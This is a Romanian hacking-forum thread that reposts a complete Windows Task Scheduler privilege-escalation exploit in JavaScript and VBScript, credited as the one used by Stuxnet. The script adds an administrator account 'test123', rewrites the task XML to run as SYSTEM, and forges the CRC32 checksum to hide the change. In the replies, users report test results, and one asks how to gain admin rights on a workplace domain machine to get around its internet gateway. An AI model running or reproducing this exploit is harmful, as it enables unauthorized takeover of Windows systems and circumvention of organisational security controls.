Windows Task Scheduler Privilege Escalation 0day

Nytro · November 24, 2010

Windows Task Scheduler Privilege Escalation 0day

# Exploit Title: Windows Task Scheduler Privilege Escalation 0day
# Date: 20-11-2010
# Author: webDEViL
# Tested on: Windows 7/2008 x86/x64


<job id="tasksch-wD-0day">
<script language="Javascript">

crc_table = new Array(
  0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419,
  0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4,
  0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07,
  0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,
  0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856,
  0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9,
  0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4,
  0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
  0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3,
  0x45DF5C75, 0xDCD60DCF, 0xABD13D59, 0x26D930AC, 0x51DE003A,
  0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599,
  0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,
  0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190,
  0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F,
  0x9FBFE4A5, 0xE8B8D433, 0x7807C9A2, 0x0F00F934, 0x9609A88E,
  0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
  0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED,
  0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950,
  0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3,
  0xFBD44C65, 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2,
  0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A,
  0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5,
  0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA, 0xBE0B1010,
  0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
  0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17,
  0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6,
  0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615,
  0x73DC1683, 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8,
  0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, 0xF00F9344,
  0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB,
  0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A,
  0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
  0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1,
  0xA6BC5767, 0x3FB506DD, 0x48B2364B, 0xD80D2BDA, 0xAF0A1B4C,
  0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF,
  0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,
  0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE,
  0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31,
  0x2CD99E8B, 0x5BDEAE1D, 0x9B64C2B0, 0xEC63F226, 0x756AA39C,
  0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
  0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B,
  0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242,
  0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1,
  0x18B74777, 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C,
  0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, 0xA00AE278,
  0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7,
  0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66,
  0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
  0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605,
  0xCDD70693, 0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8,
  0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B,
  0x2D02EF8D
);

var hD='0123456789ABCDEF';

function dec2hex(d) {
h='';
for (i=0;i<8;i++) {
h = hD.charAt(d&15)+h;
d >>>= 4;
}
return h;
}
function encodeToHex(str){
    var r="";
    var e=str.length;
    var c=0;
    var h;
    while(c<e){
        h=str.charCodeAt(c++).toString(16);
        while(h.length<3) h="0"+h;
        r+=h;
    }
    return r;
}
function decodeFromHex(str){
    var r="";
    var e=str.length;
    var s=0;
    while(e>1){

        r=r+String.fromCharCode("0x"+str.substring(s,s+2));

		s=s+2;
		e=e-2;
    }

	return r;

}


function calc_crc(anyForm) {

anyTextString=decodeFromHex(anyForm);

Crc_value = 0xFFFFFFFF;
StringLength=anyTextString.length;
for (i=0; i<StringLength; i++) {
tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
Table_value = crc_table[tableIndex];
Crc_value >>>= 8;
Crc_value ^= Table_value;
}
Crc_value ^= 0xFFFFFFFF;
return dec2hex(Crc_value);

}

function rev_crc(leadString,endString,crc32) {
//
// First, we calculate the CRC-32 for the initial string
//
	anyTextString=decodeFromHex(leadString);

   Crc_value = 0xFFFFFFFF;
   StringLength=anyTextString.length;
   //document.write(alert(StringLength));
   for (var i=0; i<StringLength; i++) {
      tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
      Table_value = crc_table[tableIndex];
      Crc_value >>>= 8;
      Crc_value ^= Table_value;
   }
//
// Second, we calculate the CRC-32 without the final string
//
   crc=parseInt(crc32,16);
   crc ^= 0xFFFFFFFF;
   anyTextString=decodeFromHex(endString);
   StringLength=anyTextString.length;
   for (var i=0; i<StringLength; i++) {
      tableIndex=0;
      Table_value = crc_table[tableIndex];
      while (((Table_value ^ crc) >>> 24)  & 0xFF) {
         tableIndex++;
         Table_value = crc_table[tableIndex];
      }
      crc ^= Table_value;
      crc <<= 8;
      crc |= tableIndex ^ anyTextString.charCodeAt(StringLength - i -1);
   }
//
// Now let's find the 4-byte string
//
   for (var i=0; i<4; i++) {
      tableIndex=0;
      Table_value = crc_table[tableIndex];
      while (((Table_value ^ crc) >>> 24)  & 0xFF) {
         tableIndex++;
         Table_value = crc_table[tableIndex];
      }
      crc ^= Table_value;
      crc <<= 8;
      crc |= tableIndex;
   }
   crc ^= Crc_value;
//
// Finally, display the results
//
   var TextString=dec2hex(crc);
   var Teststring='';
Teststring=TextString.substring(6,8);
Teststring+=TextString.substring(4,6);
Teststring+=TextString.substring(2,4);
Teststring+=TextString.substring(0,2);
   return Teststring
}
function decodeFromHex(str){
    var r="";
    var e=str.length;
    var s=0;
    while(e>1){

        r=r+String.fromCharCode("0x"+str.substring(s,s+2));

		s=s+2;
		e=e-2;
    }

	return r;

}
</script>



<script language="VBScript">
dim output
set output = wscript.stdout
output.writeline " Task Scheduler 0 day - Privilege Escalation "
output.writeline " Should work on Vista/Win7/2008 x86/x64"
output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf
biatchFile = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\xpl.bat"
Set objShell = CreateObject("WScript.Shell")
objShell.Run "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True

Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.CreateTextFile(biatchFile, True)
a.WriteLine ("net user /add test123 test123")
a.WriteLine ("net localgroup administrators /add test123")
a.WriteLine ("schtasks /delete /f /TN wDw00t")

Function ReadByteArray(strFileName)
Const adTypeBinary = 1
Dim bin
    Set bin = CreateObject("ADODB.Stream")
    bin.Type = adTypeBinary
    bin.Open
    bin.LoadFromFile strFileName
    ReadByteArray = bin.Read
'output.writeline ReadByteArray
End Function

Function OctetToHexStr (arrbytOctet)
 Dim k
 OctetToHexStr = ""
 For k = 3 To Lenb (arrbytOctet)
  OctetToHexStr = OctetToHexStr _
        & Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2)
 Next
 End Function
strFileName="C:\windows\system32\tasks\wDw00t"

hexXML = OctetToHexStr (ReadByteArray(strFileName))
'output.writeline hexXML
crc32 = calc_crc(hexXML)
output.writeline "Crc32 Original: "+crc32


Set xmlDoc = CreateObject("Microsoft.XMLDOM")
'permissions workaround
'objShell.Run "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True
'objShell.Run "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True
Set objShell = WScript.CreateObject("WScript.Shell")
Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t")

Do Until objExecObject.StdOut.AtEndOfStream
 strLine = strLine & objExecObject.StdOut.ReadLine()
Loop
hexXML = "FFFE3C00"+OctetToHexStr(strLine)
'output.writeline hexXML
Set ts = fso.createtextfile ("wDw00t.xml")
For n = 1 To (Len (hexXML) - 1) step 2
 ts.write Chr ("&h" & Mid (hexXML, n, 2))
Next
ts.close

xmlDoc.load "wDw00t.xml"
Set Author = xmlDoc.selectsinglenode ("//Task/RegistrationInfo/Author")
Author.text = "LocalSystem"
Set UserId = xmlDoc.selectsinglenode ("//Task/Principals/Principal/UserId")
UserId.text = "S-1-5-18"
xmldoc.save(strFileName)

hexXML = OctetToHexStr (ReadByteArray(strFileName))

leadString=hexXML+"3C0021002D002D00"
endString="2D002D003E00"
'output.writeline leadString
impbytes=rev_crc(leadString,endString,crc32)
output.writeline "Crc32 Magic Bytes: "+impbytes

finalString = leadString+impbytes+endString
forge = calc_crc(finalString)
output.writeline "Crc32 Forged: "+forge

strHexString="FFFE"+finalString
Set fso = CreateObject ("scripting.filesystemobject")
Set stream = CreateObject ("adodb.stream")

Set ts = fso.createtextfile (strFileName)

For n = 1 To (Len (strHexString) - 1) step 2
 ts.write Chr ("&h" & Mid (strHexString, n, 2))
Next
ts.close


Set objShell = CreateObject("WScript.Shell")
objShell.Run "schtasks /change /TN wDw00t /disable",,True
objShell.Run "schtasks /change /TN wDw00t /enable",,True
objShell.Run "schtasks /run /TN wDw00t",,True

</script>
</job>

E exploit-ul folosit de worm-ul Stuxnet.

Sursa: Windows Task Scheduler Privilege Escalation 0day

go_sword · November 24, 2010

uuuuuuu super

ceva pt 2003 este ?

Caracal · November 24, 2010

Vai Nytro te iubesc! (figure of speech)

ICEBREAKER101010 · November 25, 2010

Nu merge pe vista.Se executa scriptu dar nu adauga nici un alt user. FYI

Krisler12™ · November 25, 2010

Stai oleaca dar asta ce ar trebui sa faca: sa adauge un user nou sau altceva ?

Vad ca se chiama Windows Task Scheduler, nu cumva adauga un nou 'task' ptr. widnows task scheduler si tu astfel iti programa ca windows task scheduler sa iti execute virusul tau la ora si data stabilita ?...

LE: Imi poate explica cineva cum a facut respectivul de a generat asta:

crc_table = new Array(
  0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419,
  0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4,
  0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07,
  0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,
  0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856,
  0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9,
  0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4,
  0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
  0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3,
  0x45DF5C75, 0xDCD60DCF, 0xABD13D59, 0x26D930AC, 0x51DE003A,
  0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599,
  0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,
  0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190,
  0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F,
  0x9FBFE4A5, 0xE8B8D433, 0x7807C9A2, 0x0F00F934, 0x9609A88E,
  0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
  0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED,
  0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950,
  0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3,
  0xFBD44C65, 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2,
  0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A,
  0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5,
  0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA, 0xBE0B1010,
  0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
  0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17,
  0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6,
  0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615,
  0x73DC1683, 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8,
  0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, 0xF00F9344,
  0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB,
  0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A,
  0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
  0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1,
  0xA6BC5767, 0x3FB506DD, 0x48B2364B, 0xD80D2BDA, 0xAF0A1B4C,
  0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF,
  0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,
  0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE,
  0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31,
  0x2CD99E8B, 0x5BDEAE1D, 0x9B64C2B0, 0xEC63F226, 0x756AA39C,
  0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
  0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B,
  0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242,
  0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1,
  0x18B74777, 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C,
  0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, 0xA00AE278,
  0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7,
  0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66,
  0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
  0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605,
  0xCDD70693, 0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8,
  0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B,
  0x2D02EF8D
);

Multumesc !

pyth0n3 · November 25, 2010

Additional Information ,back in History :

Shatter Attacks Wikipedia

Shatter Attacks paper Chris Paget August 2002

Take a look at Impact of Session 0 Isolation on Services and Drivers in Windows

Caracal · November 25, 2010

te`am iubit degeaba Nytro. Vroiam sa`l testez la munca unde am windows 7 pro x64, dar user normal (nu power user sau administrator). vroiam sa`i dau userului meu drepturi de admin local (userele fiecaruia dintre noi sunt pe un domain server, nu locale) ca apoi sa bag gateway`ul pt acces la internet nici nu se executa scriptul, da o eroare -nu mai stiu care-

thnx anyway

P.S.: daca totusi are cineva o idee cum as putea face ce vreau eu, e binevenit sa si`o spuna

pyth0n3 · November 25, 2010

nici nu se executa scriptul, da o eroare -nu mai stiu care-

Pai ?i eroarea pe care o da e un secret?

Un exploit nu da o garan?ie , nu are update pt bugg-uri , arata ce se poate face, arata ca se poate face , vine personalizat în cazul în care nu da rezultatele pe care multi se a?teapt?

Caracal · November 25, 2010

eroarea nu e un secret. nu am tinut`o minte si imi era lene sa incerc iar. pentru tine, ca m`ai luat asa tare, am incercat

"15589.wsf<256, 3> Microsoft VBScript runtime error: Invalid procedure call or argument"

oricum, am incercat pe alt calculator, nu a dat nici o eroare, dar nu am reusit sa ma loghez cu userul test123 si parola test123...am incercat si local si pe domeniu...nimic

Sign In

Windows Task Scheduler Privilege Escalation 0day

Recommended Posts

Nytro

Link to comment

Share on other sites

go_sword

Link to comment

Share on other sites

Caracal

Link to comment

Share on other sites

ICEBREAKER101010

Link to comment

Share on other sites

Krisler12™

Link to comment

Share on other sites

pyth0n3

Link to comment

Share on other sites

Caracal

Link to comment

Share on other sites

pyth0n3

Link to comment

Share on other sites

Caracal

Link to comment

Share on other sites

Join the conversation

Browse

Activity

Pages